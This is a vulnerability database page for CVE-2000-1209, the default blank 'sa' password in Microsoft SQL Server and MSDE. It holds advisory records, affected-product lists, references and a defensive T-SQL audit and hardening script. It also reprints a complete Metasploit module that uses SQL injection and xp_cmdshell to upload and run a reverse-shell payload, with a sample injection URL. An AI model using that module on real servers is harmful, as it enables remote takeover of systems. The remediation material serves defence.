CVE-2000-1209
CVSS 10.0
Published: 2002-08-12 00:00:00
Revised: 2016-10-17 22:09:16

[Original] The "sa" account is installed with a default null password on (1) Microsoft SQL Server 2000, (2) SQL Server 7.0, and (3) Data Engine (MSDE) 1.0, including third party packages that use these products such as (4) Tumbleweed Secure Mail (MMS), (5) Compaq Insight Manager, and (6) Visio 2000, which allows remote attackers to gain privileges, as exploited by worms such as Voyager Alpha Force and Spida.


[CNNVD] Microsoft MSDE/SQL Server 2000 Desktop Engine Default Configuration Blank Password Vulnerability (CNNVD-200208-100)

Microsoft SQL Server Desktop Engine (MSDE) is Microsoft's redistributable database engine; Microsoft SQL Server 2000 Desktop Engine is the shared data engine Microsoft distributes with SQL Server 2000.
The default configuration of MSDE and SQL Server 2000 Desktop Engine is vulnerable: it lets remote attackers access the database with administrator privileges.
In the default configuration the administrator ('sa') password is blank, so a remote attacker can log in to the database with administrator privileges.
Worms that attack Microsoft SQL Server and derived products such as MSDE and SQL Server 2000 Desktop Engine through this default blank password already exist.

- CVSS (base score)

CVSS score: 10 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:compaq:insight_manager_xe:1.21    Compaq Insight Manager XE 1.21
cpe:/a:compaq:insight_manager_xe:2.1b    Compaq Insight Manager XE 2.1b
cpe:/a:compaq:insight_manager:7.0:sp1    Compaq Insight Manager 7.0 SP1
cpe:/a:compaq:insight_manager_xe:2.2     Compaq Insight Manager XE 2.2
cpe:/a:microsoft:data_engine:1.0         Microsoft Data Engine (MSDE) 1.0
cpe:/a:microsoft:msde:2000               Microsoft SQL Server 2000 Desktop Engine (MSDE 2000)
cpe:/a:compaq:insight_manager_xe:2.1     Compaq Insight Manager XE 2.1
cpe:/a:compaq:insight_manager_xe:1.1     Compaq Insight Manager XE 1.1
cpe:/a:compaq:insight_manager:7.0        Compaq Insight Manager 7.0
cpe:/a:compaq:insight_manager_xe:2.1c    Compaq Insight Manager XE 2.1c

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1209
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1209
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-100
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=96333895000350&w=2
(UNKNOWN)  BUGTRAQ  20000710 MSDE / Re: Default Password Database
http://marc.info/?l=bugtraq&m=96593218804850&w=2
(UNKNOWN)  BUGTRAQ  20000810 Tumbleweed Worldsecure (MMS) BLANK 'sa' account password
http://marc.info/?l=bugtraq&m=96644570412692&w=2
(UNKNOWN)  BUGTRAQ  20000816 Released Patch: Tumbleweed Worldsecure (MMS) BLANK 'sa' account password
http://online.securityfocus.com/archive/1/273639
(UNKNOWN)  BUGTRAQ  20020522 Opty-Way Enterprise includes MSDE with sa <blank>
http://security-archive.merton.ox.ac.uk/bugtraq-200008/0233.html
(UNKNOWN)  BUGTRAQ  20000815 MS-SQL 'sa' user exploit code
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q313418
(UNKNOWN)  MSKB  Q313418
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q321081
(UNKNOWN)  MSKB  Q321081
http://www.iss.net/security_center/static/1459.php
(VENDOR_ADVISORY)  XF  mssql-no-sapassword(1459)
http://www.kb.cert.org/vuls/id/635463
(VENDOR_ADVISORY)  CERT-VN  VU#635463
http://www.microsoft.com/security/security_bulletins/ms02020_sql.asp
(UNKNOWN)  CONFIRM  http://www.microsoft.com/security/security_bulletins/ms02020_sql.asp
http://www.securityfocus.com/bid/4797
(UNKNOWN)  BID  4797

- Vulnerability information

Microsoft MSDE/SQL Server 2000 Desktop Engine Default Configuration Blank Password Vulnerability
Critical    Configuration error
2002-08-12 00:00:00    2005-10-20 00:00:00
Remote

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* Manually set a strong administrator ('sa') password.
Vendor patches:
Microsoft
---------
Microsoft provides the following references for securing SQL Server:
* Q322336 HOW TO: Verify and Change the System Administrator Password by Using MSDE
  http://support.microsoft.com/default.aspx?scid=kb;EN-US;q322336
* Q321081 Visio Installation of MSDE Creates an 'sa' Account with a Blank Password
  http://support.microsoft.com/default.aspx?scid=kb;EN-US;q321081
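The two KB articles above describe the check and the fix in terms of the osql command line. The T-SQL below is an added example, not taken from the CNNVD record or from the Microsoft articles: it performs the same audit and remediation from any sysadmin session on a SQL Server 2000 or MSDE 2000 instance (for example `osql -E -S .\INSTANCENAME -i audit_sa.sql`), and adds two hardening steps that follow from the rest of this page: removing the xp_cmdshell extended procedure that the Metasploit module on this page relies on for payload delivery, and switching the instance to Windows-only authentication. Assumptions: the passphrase is a placeholder to be replaced; the object names (syslogins, sp_password, sp_dropextendedproc, xp_instance_regwrite, xplog70.dll) and the LoginMode values are the SQL Server 2000 ones; PWDCOMPARE() exists on SQL Server 2000 but is undocumented there.

```sql
-- Added example, not part of the CNNVD record or KB Q322336 / Q321081.
-- Run as a sysadmin against a SQL Server 2000 / MSDE 2000 instance, e.g.:
--   osql -E -S .\INSTANCENAME -i audit_sa.sql
-- Assumptions: the placeholder passphrase below is replaced before running;
-- object names are SQL Server 2000 system objects (syslogins, sp_password,
-- sp_dropextendedproc, xp_instance_regwrite).

USE master;
GO

-- 1. Audit: which standard (non-Windows) logins have no password at all?
--    A blank password is stored as a NULL hash in syslogins.password; the
--    PWDCOMPARE() test also catches a hash that verifies against ''.
--    'sa' appearing in this result is exactly the condition of CVE-2000-1209.
SELECT name,
       CASE WHEN sysadmin = 1 THEN 'sysadmin' ELSE '' END AS role_hint,
       createdate
FROM   syslogins
WHERE  isntname = 0
  AND  (password IS NULL OR PWDCOMPARE('', password) = 1);
GO

-- 2. Audit: is login auditing enabled? A successful blank-password 'sa' login
--    only reaches the ERRORLOG when 'audit level' is not 'none'.
EXEC xp_loginconfig 'audit level';
GO

-- 3. Remediate: set a strong sa password (the workaround CNNVD and Q322336 give).
--    @old is NULL because the current password is blank.
EXEC sp_password @old = NULL,
                 @new = 'REPLACE-with-a-long-random-passphrase-9f3b7c',
                 @loginame = 'sa';
GO

-- 4. Defence in depth: remove xp_cmdshell so a login that does obtain sa
--    cannot shell out (this is the procedure the Metasploit module on this
--    page uses to upload and run its payload). Re-register it later only if
--    an application genuinely needs it:
--      EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
EXEC sp_dropextendedproc 'xp_cmdshell';
GO

-- 5. Optional: Windows-only authentication (LoginMode 1; 2 = mixed mode).
--    SQL logins, sa included, can then no longer connect over the network.
--    Takes effect after the MSSQLSERVER service restarts, so schedule it.
EXEC xp_instance_regwrite N'HKEY_LOCAL_MACHINE',
                          N'Software\Microsoft\MSSQLServer\MSSQLServer',
                          N'LoginMode', REG_DWORD, 1;
GO

-- 6. Verify: re-run the blank-password check; 'sa' must no longer appear.
SELECT name FROM syslogins WHERE isntname = 0 AND password IS NULL;
GO
```

Step 1 is the one to keep in a scheduled job: third-party installers (Visio, Insight Manager, the other packages listed further down this page) can re-create a blank 'sa' long after the instance was first hardened, so the check needs to outlive the one-time fix in step 3.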

- Vulnerability information (F97992)

Microsoft SQL Server Payload Execution via SQL injection (PacketStormID:F97992)
2011-01-29 00:00:00
Rodrigo Marcos, David Kennedy, jduck  metasploit.com
exploit, arbitrary, sql injection
CVE-2000-0402, CVE-2000-1209, OSVDB-15757

This Metasploit module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens.

##
# $Id: mssql_payload.rb 11392 2010-12-21 20:36:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::MSSQL_SQLI
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution via SQL injection',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using a SQL injection vulnerability.

				Once a vulnerability is identified this module
				will use xp_cmdshell to upload and execute Metasploit payloads.
				It is necessary to specify the exact point where the SQL injection
				vulnerability happens. For example, given the following injection:

				http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical

				you would need to set the following path:
				set GET_PATH /show.asp?id=1;[SQLi];--&cat=electrical

				In regard to the payload, unless there is a closed port on the web server,
				you don't want to use any "bind" payload, especially on port 80, as you will
				stop reaching the vulnerable web server host. You want a "reverse" payload, probably to
				your port 80 or to any other outbound port allowed on the firewall.
				For privileged ports execute Metasploit msfconsole as root.

				Currently, three delivery methods are supported.

				First, the original method uses Windows 'debug.com'. File size restrictions are
				avoided by incorporating the debug bypass method presented by SecureStat at
				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.

				A second method takes advantage of the Command Stager subsystem. This allows using
				various techniques, such as using a TFTP server, to send the executable. By default
				the Command Stager uses 'wscript.exe' to generate the executable on the target.

				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
				payload on the target.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished.

			},
			'Author'         =>
				[
					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
					'jduck',  # command stager mods
					'Rodrigo Marcos' # SQL injection mods
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11392 $',
			'References'     =>
				[
					# 'sa' password in logs
					[ 'CVE', '2000-0402' ],
					[ 'OSVDB', '557' ],
					[ 'BID', '1281' ],

					# blank default 'sa' password
					[ 'CVE', '2000-1209' ],
					[ 'OSVDB', '15757' ],
					[ 'BID', '4797' ],

					# code and comments
					[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/' ]

				],
			'Platform'       => 'win',
			'Payload'        =>
				{
					'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 30 2000'
			))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('DELIVERY', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'old' ])
			])
	end

	# This method is required for the CmdStager to work: each staged line is run through xp_cmdshell.
	def execute_command(cmd, opts)
		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
	end

	def exploit

		method = datastore['DELIVERY'].downcase

		if (method =~ /^cmd/)
			execute_cmdstager({ :linemax => 1500, :nodelete => true })
			#execute_cmdstager({ :linemax => 1500 })
		else
			# Generate the EXE, this is the same no matter what delivery mechanism we use
			exe = generate_payload_exe

			# Use powershell method for payload delivery if specified
			if (method =~ /^ps/) or (method =~ /^power/)
				powershell_upload_exec(exe)
			else
				# Otherwise, fall back to the old way..
				mssql_upload_exec(exe, datastore['VERBOSE'])
			end
		end
		print_status("Almost there, the stager takes a while to execute. Waiting 50 seconds...")
		select(nil,nil,nil,50)
		handler
		disconnect
	end


end

    

- Vulnerability information (OSVDB)

OSVDB ID: 15757
Microsoft SQL Server sa Account Default Null Password
Location: Remote / Network Access    Attack type: Authentication Management
Impact: Loss of Integrity
Exploit: Public, Commercial

- Vulnerability description

By default, Microsoft SQL Server installs with a default password. The 'sa' account has a null password which is publicly known and documented. This allows remote attackers to trivially access the program or system.

- Timeline

2000-07-10 Unknown
2000-07-10 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: secure the 'sa' account with a password.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information (Bugtraq)

Microsoft MSDE/SQL Server 2000 Desktop Engine Default Configuration Vulnerability
Class: Configuration Error    Bugtraq ID: 4797
Remote: Yes    Local: No
Published: 2002-05-22 12:00:00    Updated: 2009-07-11 12:46:00
Credited to Adrian Romo of Quilogy.

- Affected program versions

Optima Opty-Way Enterprise 1.0
Microsoft SQL Server 2000 Desktop Engine
+ Akiva WebBoard 6.1
+ Microsoft Access 2000
+ Microsoft Application Center 2000
+ Microsoft BizTalk Server 2000 Developer Edition
+ Microsoft BizTalk Server 2000 Enterprise Edition
+ Microsoft BizTalk Server 2000 Standard Edition
+ Microsoft BizTalk Server 2002 Developer Edition
+ Microsoft BizTalk Server 2002 Enterprise Edition
+ Microsoft Office 2000
+ Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ SmartMax Software MailMax 5.0
+ Veritas Software Backup Exec for Windows Servers 9.0
Microsoft MSDE 1.0
+ Microsoft Visio 2000 Enterprise Edition SR1
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visual Studio 6.0
+ Optima Opty-Way Enterprise 1.0
+ Websense Reporter 6.3.1
Compaq Open SAN Manager 1.0 c
Compaq Insight Manager XE 2.2
Compaq Insight Manager XE 2.1 c
Compaq Insight Manager XE 2.1 b
Compaq Insight Manager XE 2.1
Compaq Insight Manager XE 1.21
Compaq Insight Manager XE 1.1
Compaq Insight Manager 7.0 SP1
Compaq Insight Manager 7.0
Avaya CentreVu Explorer II
Avaya CentreVu / Nice Call Recording System 8.5

- Discussion

Microsoft MSDE and SQL Server 2000 Desktop Engine are reported to ship with a null administrative ('sa') password by default. Remote attackers may exploit this to gain administrative access to the database if the password has not been changed manually.

Compaq Insight Manager XE versions 1.1 and later include the capability to use MSDE. MSDE is not installed as part of Compaq Insight Manager by default. When MSDE is installed via Compaq Insight Manager, it is recommended during that install that users change the 'sa' administrative password. Installs via Compaq Management CD or Insight Manager 7 softpaqs include no such recommendation.

It should be noted that a worm is currently propagating due to default null passwords in Microsoft SQL server and derived products such as MSDE and SQL Server 2000 Desktop Engine.

- Exploit

No exploit code is required.

- Solution

Avaya have released a security advisory that contains recommended actions to fix this issue in CentreVu Explorer II and CentreVu/Nice Call Recording System 8.5 and later. Please see the referenced advisory for further details.

Microsoft has released security recommendations for administrators of SQL server and related products. A link to this document is included in the links section of this record bulletin.

Some Compaq Insight Manager releases include the capability to use MSDE. If MSDE is installed, users are advised to ensure that the default null administrative password is changed. The service must be restarted for any changes to take effect.

HP has released a security advisory (HPSBMA01168) detailing a revision to the Compaq advisory SSRT2195. Please see the referenced advisory for further information.

Setting a hard-to-guess password will effectively eliminate this vulnerability.

A patch is available for Compaq Open SAN Manager:


Compaq Open SAN Manager 1.0 c

- References

 

 
